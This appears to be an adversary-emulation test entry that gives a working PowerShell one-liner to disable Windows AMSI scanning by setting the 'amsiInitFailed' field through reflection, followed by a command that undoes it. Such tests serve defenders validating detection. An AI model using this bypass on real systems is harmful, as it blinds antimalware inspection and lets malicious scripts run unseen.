#TechniqueName: Impair Defenses: Disable or Modify Tools
#AtomicTestName: AMSI Bypass - AMSI InitFailed
#Description: Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.&Upon execution, no output is displayed.&&https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/&
#Language: ps1

#commands
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)


#cleanup_commands
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)

